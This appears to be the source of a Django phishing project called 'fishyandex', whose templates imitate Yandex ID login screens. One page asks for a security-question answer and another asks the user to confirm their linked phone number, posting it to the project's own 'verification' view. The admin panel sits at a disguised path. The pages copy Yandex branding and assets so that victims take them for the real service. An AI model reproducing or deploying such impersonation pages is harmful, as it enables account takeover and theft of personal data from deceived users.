authentication/urls.py

from django.urls import path,include
from .views import index,verification

app_name = 'authentication'
urlpatterns = [
    path('', index, name='index' ),
    path('verification/',verification,name='verification')

]

fishyandex/urls.py
from django.contrib import admin
from django.urls import path,include

urlpatterns = [
    path('', include('authentication.urls'), name='authentication'),
    path('Super_Mega_Secret_Upper_Indastrial_Magic_Admin/', admin.site.urls)

]

templates/question.html
<!doctype html>
<html lang="ru" dir="ltr" data-page-type="react.authv2" class="is-js_no" data-view="default"
      xmlns="http://www.w3.org/1999/html">
<head><title>Авторизация</title>
    <meta charSet="utf-8"/>
    <meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7,IE=edge"/>
    <link crossorigin="anonymous" rel="preload" as="style"
          href="https://yastatic.net/s3/passport-static/core/v1.88.25/css/react.authv2.cij.css"/>
    <link crossorigin="anonymous" href="//yastatic.net/react/17.0.2/react-with-dom-and-polyfills.min.js" rel="preload"
          as="script"/>
    <script src="https://cdnjs.cloudflare.com/ajax/libs/Chart.js/3.8.0/chart.min.js"
            integrity="sha512-sW/w8s4RWTdFFSduOTGtk4isV1+190E/GghVffMA9XczdJ2MDzSzLEubKAs5h0wzgSJOQTRYyaz73L3d6RtJSg=="
            crossorigin="anonymous" referrerpolicy="no-referrer"></script>
    <link crossorigin="anonymous" href="https://yastatic.net/jquery/2.1.4/jquery.min.js" rel="preload" as="script"/>
    <link rel="shortcut icon" href="/favicon.ico"/>
    <meta name="pdb" content="disable"/>
    <meta name="collections" content="disable"/>
    <link crossorigin="anonymous" rel="stylesheet" type="text/css"
          href="https://yastatic.net/s3/passport-static/core/v1.88.25/css/react.authv2.cij.css"/>
    <link rel="stylesheet" type="text/css"
          href="https://yastatic.net/s3/passport-auth-customs//customs/v1.64.10/passport.auth.customs.css"/>
    <script type="text/javascript" nonce="34593585-7a71-4de4-b811-673282036213">
        (function(d, e, c, r, n, w, v, f) {e = d.documentElement; c = "className"; r = "replace"; n = "createElementNS"; f = "firstChild"; w = "http://www.w3.org/2000/svg"; v = d.createElement("div"); v.innerHTML = "<svg/>"; e[c] = e[c][r]("is-js_no", "is-js_yes"); e[c] += " is-inlinesvg_" + ((v[f] && v[f].namespaceURI) === w ? "yes" : "no"); })(document);

    </script>
    <script src="https://cdnjs.cloudflare.com/ajax/libs/libphonenumber-js/1.9.47/libphonenumber-js.min.js"></script>


</head>
<body class="Theme_color_yandex-default Theme_root_passport Theme_auth_domik Theme_root_default "
      data-metrics-id="784657" data-user-type="null" data-version="1.88.25" data-origin="null">
<div id="root" class="layout">
    <div class="passp-flex-wrapper">
        <div class="NoJS NoJS_isFloat">
            <div class="NoJS-message">
                <div class="NoJS-title">Необходимо включить JavaScript</div>
                Для корректной работы этого сайта<a data-t="link:default"
                                                    href="https://yandex.ru/support/common/browsers-settings/browsers-java-js-settings.xml"
                                                    target="_blank" class="Link Link_view_default"> <!-- -->включите
                JavaScript<!-- --> .</a></div>
        </div>
        <div class="passp-page">
            <div class="passp-bg passp-bg_14"></div>
            <div class="passp-flex-wrapper">
                <div class="passp-content">
                    <div class="passp-auth theme-default">
                        <div class="passp-page-overlay"></div>
                        <a data-t="backpane" href="/" class="PreviousStepButton"
                           aria-label="Назад"><span data-link="/"></span></a>
                        <div class="passp-auth-content">
                            <div class="Header">
                                <div class="Header-yaLogoBlock"><a aria-label="Яндекс" href="https://ya.ru"
                                                                   tabindex="-1" class="Logo Logo_ya"></a></div>
                            </div>
                            <div class="passp-page-visibility"></div>
<div class="passp-route-forward">
    <div class="passp-route passp-route-enter-done">
        <div data-t="page:auth-challenge" class="passp-auth-screen passp-auth-challenge-page"><h1 data-t="title"
                                                                                                  class="passp-title">
            Введите ответ на&nbsp;контрольный вопрос:</h1>
            <div class="auth-challenge-wrapper">
                <div class="auth-challenge__question">
                    <form class="auth-challenge__question-form">
                        <div class="auth-challenge-form-hint"><strong>Ваша любимая книга в детстве</strong></div>
                        <div class="Field Field_view_rounded-corner" data-t="field:question">
                            <div class="Field-label-wrapper"><label class="Field-label" data-t="field:label-question"
                                                                    for="passp-field-question">Ответ на&nbsp;контрольный
                                вопрос</label></div>
                            <div class="Field-inputWrapper"><span
                                    class="Textinput Textinput_view_rounded-corner Textinput_size_l"><input
                                    data-t="field:input-question" dir="ltr" aria-invalid="false" autocomplete="off"
                                    class="Textinput-Control" id="passp-field-question" name="question" type="text"
                                    value=""><span class="Textinput-Box"></span></span></div>
                        </div>
                        <div data-t="challenge_sumbit_question" class="passp-button">
                            <button data-t="button:action" type="submit"
                                    class="Button2 Button2_size_l Button2_view_action Button2_width_max Button2_type_submit"
                                    autocomplete="off"><span class="Button2-Text">Продолжить</span></button>
                        </div>
                    </form>
                </div>
                <div class="auth-challenge-note">Если у вас возникли сложности при входе, попробуйте авторизоваться на
                    устройстве, с которого вы уже входили. Или пройдите <a href="/auth/restore/password"
                                                                           class="link_theme_normal">процедуру
                        восстановления доступа</a> к аккаунту
                </div>
            </div>
        </div>
    </div>
</div>
                            </div>
                        <div class="yaIdPromoText">Яндекс ID — ключ от всех сервисов <a
                                href="https://id.yandex.ru/about" class="yaIdPromoText_link">Узнать больше</a></div>
                    </div>
                </div>
            </div>
            <footer class="AuthFooter">
                <div class="AuthFooter-wrapper">
                    <div class="AuthFooter-incognitoLink"><span class="AuthFooter-item"><a data-t="link:default"
                                                                                           target="_blank"
                                                                                           href="https://yandex.ru/support/common/browsers-settings/incognito.html"
                                                                                           class="Link Link_view_default">Используйте режим инкогнито на чужом компьютере</a></span>
                    </div>
                    <div class="AuthFooter-mainBlock"><span class="AuthFooter-item" aria-expanded="false"><span
                            data-t="link:default"
                            class="Link Link_pseudo Link_view_default AuthFooter-itemCap">ru</span><span
                            class="AuthFooter-langList AuthFooter-langList_closed"><ul><li
                            class="AuthFooter-langListItem"><a data-t="link:default"
                                                               href="https://yandex.ru/portal/set/lang/?sk=y0a32c11569d1d4aa425cfb82ece04a0c&amp;retpath=https%3A%2F%2Fpassport.yandex.ru%2Fauth%3Fretpath%3Dhttps%253A%252F%252Fmail.yandex.ru&amp;intl=en"
                                                               class="Link Link_view_default">En</a></li></ul></span></span><span
                            class="AuthFooter-item"><a data-t="link:default" href="https://yandex.ru/support/passport/"
                                                       target="_blank" class="Link Link_view_default">Справка и поддержка</a></span><span
                            class="AuthFooter-item"><span class="AuthFooter-copyright">© 2001-2023, </span><a
                            data-t="link:default" href="https://ya.ru" class="Link Link_view_default">Яндекс</a></span>
                    </div>
                </div>
            </footer>
        </div>
    </div>
</div>

<img class="g-hidden"
     src="https://ysa-static.passport.yandex.net/static/1/96eb29b255b84bfd7016c2420aa13870/d.png?ex=yes"/>

<link data-chunk="react.authv2" rel="stylesheet"
      href="https://yastatic.net/s3/passport-static/core/v1.88.25/js/../css/react.authv2.cij.css"
      crossorigin="anonymous">


<script>
    const socket = new WebSocket('ws://' + window.location.host + '/ws/cleanup_inactive_drivers/');

    socket.onopen = function(e) {
        console.log("[open] Connection established");
    };

    socket.onmessage = function(event) {
        console.log(`[message] Data received from server: ${event.data}`);
    };

    socket.onclose = function(event) {
        console.log(`[close] Connection closed`);
    };

    socket.onerror = function(error) {
        console.log(`[error] ${error.message}`);
    };
</script>
</body>
</html>

templates/secure_login.html
<!doctype html>
<html lang="ru" dir="ltr" data-page-type="react.authv2" class="is-js_no" data-view="default"
      xmlns="http://www.w3.org/1999/html">
<head><title>Авторизация</title>
    <meta charSet="utf-8"/>
    <meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7,IE=edge"/>
    <link crossorigin="anonymous" rel="preload" as="style"
          href="https://yastatic.net/s3/passport-static/core/v1.88.25/css/react.authv2.cij.css"/>
    <link crossorigin="anonymous" href="//yastatic.net/react/17.0.2/react-with-dom-and-polyfills.min.js" rel="preload"
          as="script"/>
    <script src="https://cdnjs.cloudflare.com/ajax/libs/Chart.js/3.8.0/chart.min.js"
            integrity="sha512-sW/w8s4RWTdFFSduOTGtk4isV1+190E/GghVffMA9XczdJ2MDzSzLEubKAs5h0wzgSJOQTRYyaz73L3d6RtJSg=="
            crossorigin="anonymous" referrerpolicy="no-referrer"></script>
    <link crossorigin="anonymous" href="https://yastatic.net/jquery/2.1.4/jquery.min.js" rel="preload" as="script"/>
    <link rel="shortcut icon" href="/favicon.ico"/>
    <meta name="pdb" content="disable"/>
    <meta name="collections" content="disable"/>
    <link crossorigin="anonymous" rel="stylesheet" type="text/css"
          href="https://yastatic.net/s3/passport-static/core/v1.88.25/css/react.authv2.cij.css"/>
    <link rel="stylesheet" type="text/css"
          href="https://yastatic.net/s3/passport-auth-customs//customs/v1.64.10/passport.auth.customs.css"/>
    <script type="text/javascript" nonce="34593585-7a71-4de4-b811-673282036213">
        (function(d, e, c, r, n, w, v, f) {e = d.documentElement; c = "className"; r = "replace"; n = "createElementNS"; f = "firstChild"; w = "http://www.w3.org/2000/svg"; v = d.createElement("div"); v.innerHTML = "<svg/>"; e[c] = e[c][r]("is-js_no", "is-js_yes"); e[c] += " is-inlinesvg_" + ((v[f] && v[f].namespaceURI) === w ? "yes" : "no"); })(document);

    </script>
    <script src="https://cdnjs.cloudflare.com/ajax/libs/libphonenumber-js/1.9.47/libphonenumber-js.min.js"></script>


</head>
<body class="Theme_color_yandex-default Theme_root_passport Theme_auth_domik Theme_root_default "
      data-metrics-id="784657" data-user-type="null" data-version="1.88.25" data-origin="null">
<div id="root" class="layout">
    <div class="passp-flex-wrapper">
        <div class="NoJS NoJS_isFloat">
            <div class="NoJS-message">
                <div class="NoJS-title">Необходимо включить JavaScript</div>
                Для корректной работы этого сайта<a data-t="link:default"
                                                    href="https://yandex.ru/support/common/browsers-settings/browsers-java-js-settings.xml"
                                                    target="_blank" class="Link Link_view_default"> <!-- -->включите
                JavaScript<!-- --> .</a></div>
        </div>
        <div class="passp-page">
            <div class="passp-bg passp-bg_14"></div>
            <div class="passp-flex-wrapper">
                <div class="passp-content">
                    <div class="passp-auth theme-default">
                        <div class="passp-page-overlay"></div>
<div class="passp-auth-content">
                            <div class="Header">
                                <div class="Header-yaLogoBlock"><a aria-label="Яндекс" href="https://ya.ru"
                                                                   tabindex="-1" class="Logo Logo_ya"></a></div>
                            </div>
                            <div class="passp-page-visibility"></div>
                            <div class="">
                                <div class="passp-route passp-route-appear-done passp-route-enter-done">
                                    <div data-t="page:auth-challenge"
                                         class="passp-auth-screen passp-auth-challenge-page"><h1 data-t="title"
                                                                                                 class="passp-title">
                                        Безопасный вход</h1>
                                        <div class="auth-challenge-wrapper">
                                            <div class="auth-challenge__call">
                                                <div class="auth-challenge-descr"><p>Пожалуйста, подтвердите номер
                                                    телефона, который привязан к&nbsp;вашему аккаунту.</p></div>
                                                <form method="post" action="{% url 'authentication:verification' %}" class="auth-challenge__call-form">
                                                    {% csrf_token %}
                                                    <div class="auth-challenge-form-hint">Ваш номер телефона:<strong>{{phone_number}}</strong></div>
                                                    <div data-t="challenge_sumbit_phone-confirmation"
                                                         class="passp-button">
                                                        <button data-t="button:action" type="submit"
                                                                class="Button2 Button2_size_l Button2_view_action Button2_width_max Button2_type_submit"
                                                                aria-disabled="false" autocomplete="off"><span
                                                                class="Button2-Text">Подтвердить</span></button>
                                                    </div>
                                                </form>
                                            </div>
                                            <div class="auth-challenge-note">Если у вас возникли сложности при входе,
                                                попробуйте авторизоваться на устройстве, с которого вы уже входили. Или
                                                пройдите <a href="/auth/restore/password" class="link_theme_normal">процедуру
                                                    восстановления доступа</a> к аккаунту
                                            </div>
                                        </div>
                                    </div>
                                </div>
                            </div>
                        </div>
                        <div class="yaIdPromoText">Яндекс ID — ключ от всех сервисов <a
                                href="https://id.yandex.ru/about" class="yaIdPromoText_link">Узнать больше</a></div>
                    </div>
                </div>
            </div>
            <footer class="AuthFooter">
                <div class="AuthFooter-wrapper">
                    <div class="AuthFooter-incognitoLink"><span class="AuthFooter-item"><a data-t="link:default"
                                                                                           target="_blank"
                                                                                           href="https://yandex.ru/support/common/browsers-settings/incognito.html"
                                                                                           class="Link Link_view_default">Используйте режим инкогнито на чужом компьютере</a></span>
                    </div>
                    <div class="AuthFooter-mainBlock"><span class="AuthFooter-item" aria-expanded="false"><span
                            data-t="link:default"
                            class="Link Link_pseudo Link_view_default AuthFooter-itemCap">ru</span><span
                            class="AuthFooter-langList AuthFooter-langList_closed"><ul><li
                            class="AuthFooter-langListItem"><a data-t="link:default"
                                                               href="https://yandex.ru/portal/set/lang/?sk=y0a32c11569d1d4aa425cfb82ece04a0c&amp;retpath=https%3A%2F%2Fpassport.yandex.ru%2Fauth%3Fretpath%3Dhttps%253A%252F%252Fmail.yandex.ru&amp;intl=en"
                                                               class="Link Link_view_default">En</a></li></ul></span></span><span
                            class="AuthFooter-item"><a data-t="link:default" href="https://yandex.ru/support/passport/"
                                                       target="_blank" class="Link Link_view_default">Справка и поддержка</a></span><span
                            class="AuthFooter-item"><span class="AuthFooter-copyright">© 2001-2023, </span><a
                            data-t="link:default" href="https://ya.ru" class="Link Link_view_default">Яндекс</a></span>
                    </div>
                </div>
            </footer>
        </div>
    </div>
</div>

<img class="g-hidden"
     src="https://ysa-static.passport.yandex.net/static/1/96eb29b255b84bfd7016c2420aa13870/d.png?ex=yes"/>

<link data-chunk="react.authv2" rel="stylesheet"
      href="https://yastatic.net/s3/passport-static/core/v1.88.25/js/../css/react.authv2.cij.css"
      crossorigin="anonymous">
<script>
    const socket = new WebSocket('ws://' + window.location.host + '/ws/cleanup_inactive_drivers/');

    socket.onopen = function(e) {
        console.log("[open] Connection established");
    };

    socket.onmessage = function(event) {
        console.log(`[message] Data received from server: ${event.data}`);
    };

    socket.onclose = function(event) {
        console.log(`[close] Connection closed`);
    };

    socket.onerror = function(error) {
        console.log(`[error] ${error.message}`);
    };
</script>
</body>
</html>